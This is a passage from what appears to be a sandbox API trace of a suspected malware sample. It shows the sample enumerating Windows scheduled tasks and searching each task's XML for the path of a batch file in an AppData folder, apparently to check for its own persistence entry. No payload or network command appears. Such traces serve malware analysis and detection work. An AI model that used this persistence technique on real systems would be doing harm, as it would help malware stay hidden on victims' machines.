\r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.428] IUnknown:Release (This=0x929600) returned 0x0 [0162.428] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929600) returned 0x0 [0162.428] IRegisteredTask:get_Name (in: This=0x929600, pName=0xce058 | out: pName=0xce058*="Sysprep Generalize Drivers") returned 0x0 [0162.428] IRegisteredTask:get_Xml (in: This=0x929600, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\System32\\sppnp.dll,-2000)\r\n $(@%SystemRoot%\\System32\\sppnp.dll,-2001)\r\n \\Microsoft\\Windows\\Plug and Play\\Sysprep Generalize Drivers\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\drvinst.exe\r\n 6\r\n \r\n \r\n") returned 0x0 [0162.429] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\System32\\sppnp.dll,-2000)\r\n $(@%SystemRoot%\\System32\\sppnp.dll,-2001)\r\n \\Microsoft\\Windows\\Plug and Play\\Sysprep Generalize Drivers\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\drvinst.exe\r\n 6\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.429] IUnknown:Release (This=0x929600) returned 0x0 [0162.429] IUnknown:Release (This=0x929470) returned 0x0 [0162.429] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.430] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.430] IUnknown:Release (This=0x929470) returned 0x0 [0162.430] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.430] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2d, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.430] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929490) returned 0x0 [0162.430] IRegisteredTaskCollection:get_Count (in: This=0x929490, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.430] IRegisteredTaskCollection:get_Item (in: This=0x929490, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929630) returned 0x0 [0162.430] IRegisteredTask:get_Name (in: This=0x929630, pName=0xce058 | out: pName=0xce058*="AnalyzeSystem") returned 0x0 [0162.430] IRegisteredTask:get_Xml (in: This=0x929630, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)(A;;FRFX;;;LS)\r\n $(@%systemRoot%\\system32\\energytask.dll,-601)\r\n $(@%systemRoot%\\system32\\energytask.dll,-600)\r\n $(@%systemRoot%\\system32\\energytask.dll,-602)\r\n \\Microsoft\\Windows\\Power Efficiency Diagnostics\\AnalyzeSystem\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n PT5M\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n true\r\n \r\n \r\n \r\n \r\n \r\n {927EA2AF-1C54-43D5-825E-0074CE028EEE}\r\n \r\n \r\n") returned 0x0 [0162.431] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)(A;;FRFX;;;LS)\r\n $(@%systemRoot%\\system32\\energytask.dll,-601)\r\n $(@%systemRoot%\\system32\\energytask.dll,-600)\r\n $(@%systemRoot%\\system32\\energytask.dll,-602)\r\n \\Microsoft\\Windows\\Power Efficiency Diagnostics\\AnalyzeSystem\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n PT5M\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n true\r\n \r\n \r\n \r\n \r\n \r\n {927EA2AF-1C54-43D5-825E-0074CE028EEE}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.431] IUnknown:Release (This=0x929630) returned 0x0 [0162.431] IUnknown:Release (This=0x929490) returned 0x0 [0162.431] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929490) returned 0x0 [0162.432] ITaskFolderCollection:get_Count (in: This=0x929490, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.432] IUnknown:Release (This=0x929490) returned 0x0 [0162.432] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.432] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.432] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929460) returned 0x0 [0162.432] IRegisteredTaskCollection:get_Count (in: This=0x929460, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.432] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295d0) returned 0x0 [0162.432] IRegisteredTask:get_Name (in: This=0x9295d0, pName=0xce058 | out: pName=0xce058*="MobilityManager") returned 0x0 [0162.432] IRegisteredTask:get_Xml (in: This=0x9295d0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)\r\n $(@%SystemRoot%\\system32\\rasmbmgr.dll,-201)\r\n $(@%SystemRoot%\\system32\\rasmbmgr.dll,-202)\r\n \\Microsoft\\Windows\\Ras\\MobilityManager\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n false\r\n false\r\n Parallel\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n <QueryList>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n <Query\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n Id=\"0\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n Path=\"Application\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n >\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n <Select Path=\"Application\">*[System[Provider[@Name='RasClient'] and (Level=4 or Level=0) and (EventID=20281)]]</Select>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n </Query>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n {C463A0FC-794F-4FDF-9201-01938CEACAFA}\r\n \r\n \r\n") returned 0x0 [0162.433] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)\r\n $(@%SystemRoot%\\system32\\rasmbmgr.dll,-201)\r\n $(@%SystemRoot%\\system32\\rasmbmgr.dll,-202)\r\n \\Microsoft\\Windows\\Ras\\MobilityManager\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n false\r\n false\r\n Parallel\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n <QueryList>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n <Query\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n Id=\"0\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n Path=\"Application\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n >\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n <Select Path=\"Application\">*[System[Provider[@Name='RasClient'] and (Level=4 or Level=0) and (EventID=20281)]]</Select>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n </Query>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n {C463A0FC-794F-4FDF-9201-01938CEACAFA}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.433] IUnknown:Release (This=0x9295d0) returned 0x0 [0162.433] IUnknown:Release (This=0x929460) returned 0x0 [0162.433] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929460) returned 0x0 [0162.433] ITaskFolderCollection:get_Count (in: This=0x929460, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.434] IUnknown:Release (This=0x929460) returned 0x0 [0162.434] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.434] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2f, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.434] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929480) returned 0x0 [0162.434] IRegisteredTaskCollection:get_Count (in: This=0x929480, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.434] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929610) returned 0x0 [0162.434] IRegisteredTask:get_Name (in: This=0x929610, pName=0xce058 | out: pName=0xce058*="VerifyWinRE") returned 0x0 [0162.434] IRegisteredTask:get_Xml (in: This=0x929610, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\ReAgentTask.dll,-602)\r\n $(@%SystemRoot%\\system32\\ReAgentTask.dll,-601)\r\n $(@%SystemRoot%\\system32\\ReAgentTask.dll,-603)\r\n \\Microsoft\\Windows\\RecoveryEnvironment\\VerifyWinRE\r\n \r\n \r\n \r\n S-1-5-32-544\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n false\r\n false\r\n PT1H\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n P14D\r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n {89D1D0C2-A3CF-490C-ABE3-B86CDE34B047}\r\n \r\n \r\n \r\n") returned 0x0 [0162.435] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\ReAgentTask.dll,-602)\r\n $(@%SystemRoot%\\system32\\ReAgentTask.dll,-601)\r\n $(@%SystemRoot%\\system32\\ReAgentTask.dll,-603)\r\n \\Microsoft\\Windows\\RecoveryEnvironment\\VerifyWinRE\r\n \r\n \r\n \r\n S-1-5-32-544\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n false\r\n false\r\n PT1H\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n P14D\r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n {89D1D0C2-A3CF-490C-ABE3-B86CDE34B047}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.435] IUnknown:Release (This=0x929610) returned 0x0 [0162.435] IUnknown:Release (This=0x929480) returned 0x0 [0162.435] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929480) returned 0x0 [0162.435] ITaskFolderCollection:get_Count (in: This=0x929480, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.435] IUnknown:Release (This=0x929480) returned 0x0 [0162.435] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.436] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x30, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.436] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929460) returned 0x0 [0162.436] IRegisteredTaskCollection:get_Count (in: This=0x929460, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.436] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295e0) returned 0x0 [0162.436] IRegisteredTask:get_Name (in: This=0x9295e0, pName=0xce058 | out: pName=0xce058*="RegIdleBackup") returned 0x0 [0162.436] IRegisteredTask:get_Xml (in: This=0x9295e0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)(A;;FRFX;;;LS)\r\n $(@%systemroot%\\system32\\regidle.dll,-601)\r\n $(@%systemroot%\\system32\\regidle.dll,-600)\r\n $(@%systemroot%\\system32\\regidle.dll,-602)\r\n \\Microsoft\\Windows\\Registry\\RegIdleBackup\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n false\r\n PT0S\r\n true\r\n IgnoreNew\r\n 5\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P10D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n {CA767AA8-9157-4604-B64B-40747123D5F2}\r\n \r\n \r\n") returned 0x0 [0162.437] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)(A;;FRFX;;;LS)\r\n $(@%systemroot%\\system32\\regidle.dll,-601)\r\n $(@%systemroot%\\system32\\regidle.dll,-600)\r\n $(@%systemroot%\\system32\\regidle.dll,-602)\r\n \\Microsoft\\Windows\\Registry\\RegIdleBackup\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n false\r\n PT0S\r\n true\r\n IgnoreNew\r\n 5\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P10D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n {CA767AA8-9157-4604-B64B-40747123D5F2}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.437] IUnknown:Release (This=0x9295e0) returned 0x0 [0162.437] IUnknown:Release (This=0x929460) returned 0x0 [0162.437] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929460) returned 0x0 [0162.438] ITaskFolderCollection:get_Count (in: This=0x929460, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.438] IUnknown:Release (This=0x929460) returned 0x0 [0162.438] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.438] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x31, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.438] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x9294a0) returned 0x0 [0162.438] IRegisteredTaskCollection:get_Count (in: This=0x9294a0, pCount=0xce048 | out: pCount=0xce048*=0) returned 0x0 [0162.438] IUnknown:Release (This=0x9294a0) returned 0x0 [0162.438] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x9294a0) returned 0x0 [0162.438] ITaskFolderCollection:get_Count (in: This=0x9294a0, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.438] IUnknown:Release (This=0x9294a0) returned 0x0 [0162.438] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.438] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x32, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.438] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.439] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.439] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929600) returned 0x0 [0162.439] IRegisteredTask:get_Name (in: This=0x929600, pName=0xce058 | out: pName=0xce058*="RemoteAssistanceTask") returned 0x0 [0162.439] IRegisteredTask:get_Xml (in: This=0x929600, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2005-11-08T17:18:32\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%systemroot%\\system32\\msra.exe,-687)\r\n $(@%systemroot%\\system32\\msra.exe,-686)\r\n $(@%systemroot%\\system32\\msra.exe,-688)\r\n \\Microsoft\\Windows\\RemoteAssistance\\RemoteAssistanceTask\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n Queue\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT15S\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\RAServer.exe\r\n /offerraupdate\r\n %windir%\r\n \r\n \r\n") returned 0x0 [0162.440] StrStrIW (lpFirst="\r\n\r\n \r\n 2005-11-08T17:18:32\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%systemroot%\\system32\\msra.exe,-687)\r\n $(@%systemroot%\\system32\\msra.exe,-686)\r\n $(@%systemroot%\\system32\\msra.exe,-688)\r\n \\Microsoft\\Windows\\RemoteAssistance\\RemoteAssistanceTask\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n Queue\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT15S\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\RAServer.exe\r\n /offerraupdate\r\n %windir%\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.440] IUnknown:Release (This=0x929600) returned 0x0 [0162.440] IUnknown:Release (This=0x929470) returned 0x0 [0162.440] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.440] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.440] IUnknown:Release (This=0x929470) returned 0x0 [0162.440] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.440] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x33, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.441] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.441] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=0) returned 0x0 [0162.441] IUnknown:Release (This=0x929470) returned 0x0 [0162.441] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.441] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.441] IUnknown:Release (This=0x929470) returned 0x0 [0162.441] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.441] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x34, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.441] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.442] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.442] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295f0) returned 0x0 [0162.442] IRegisteredTask:get_Name (in: This=0x9295f0, pName=0xce058 | out: pName=0xce058*="StartComponentCleanup") returned 0x0 [0162.442] IRegisteredTask:get_Xml (in: This=0x9295f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n \\Microsoft\\Windows\\Servicing\\StartComponentCleanup\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n PT1H\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n {752073A1-23F2-4396-85F0-8FDB879ED0ED}\r\n \r\n \r\n") returned 0x0 [0162.442] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Servicing\\StartComponentCleanup\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n PT1H\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n {752073A1-23F2-4396-85F0-8FDB879ED0ED}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.443] IUnknown:Release (This=0x9295f0) returned 0x0 [0162.443] IUnknown:Release (This=0x929470) returned 0x0 [0162.443] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.443] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.443] IUnknown:Release (This=0x929470) returned 0x0 [0162.443] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.443] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x35, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.443] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.444] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0162.445] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295f0) returned 0x0 [0162.445] IRegisteredTask:get_Name (in: This=0x9295f0, pName=0xce058 | out: pName=0xce058*="BackgroundUploadTask") returned 0x0 [0162.445] IRegisteredTask:get_Xml (in: This=0x9295f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FRFX;;;AU)(A;;FA;;;SY)\r\n \\Microsoft\\Windows\\SettingSync\\BackgroundUploadTask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n true\r\n Parallel\r\n true\r\n true\r\n \r\n PT3H\r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n \r\n {59B9640B-3F70-4D1C-B159-F26EEB8A4C87}\r\n \r\n \r\n") returned 0x0 [0162.445] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FRFX;;;AU)(A;;FA;;;SY)\r\n \\Microsoft\\Windows\\SettingSync\\BackgroundUploadTask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n true\r\n Parallel\r\n true\r\n true\r\n \r\n PT3H\r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n \r\n {59B9640B-3F70-4D1C-B159-F26EEB8A4C87}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.445] IUnknown:Release (This=0x9295f0) returned 0x0 [0162.445] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295f0) returned 0x0 [0162.446] IRegisteredTask:get_Name (in: This=0x9295f0, pName=0xce058 | out: pName=0xce058*="NetworkStateChangeTask") returned 0x0 [0162.446] IRegisteredTask:get_Xml (in: This=0x9295f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FRFX;;;AU)(A;;FA;;;BA)(A;;FA;;;SY)\r\n \\Microsoft\\Windows\\SettingSync\\NetworkStateChangeTask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n PT0S\r\n true\r\n Queue\r\n 6\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA33E0B8441\r\n 03\r\n \r\n \r\n 7510BCA33E0B8441\r\n 03\r\n \r\n \r\n \r\n \r\n {A4173A49-F373-4475-9A0F-2D615204DC20}\r\n \r\n \r\n") returned 0x0 [0162.446] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FRFX;;;AU)(A;;FA;;;BA)(A;;FA;;;SY)\r\n \\Microsoft\\Windows\\SettingSync\\NetworkStateChangeTask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n PT0S\r\n true\r\n Queue\r\n 6\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA33E0B8441\r\n 03\r\n \r\n \r\n 7510BCA33E0B8441\r\n 03\r\n \r\n \r\n \r\n \r\n {A4173A49-F373-4475-9A0F-2D615204DC20}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.446] IUnknown:Release (This=0x9295f0) returned 0x0 [0162.446] IUnknown:Release 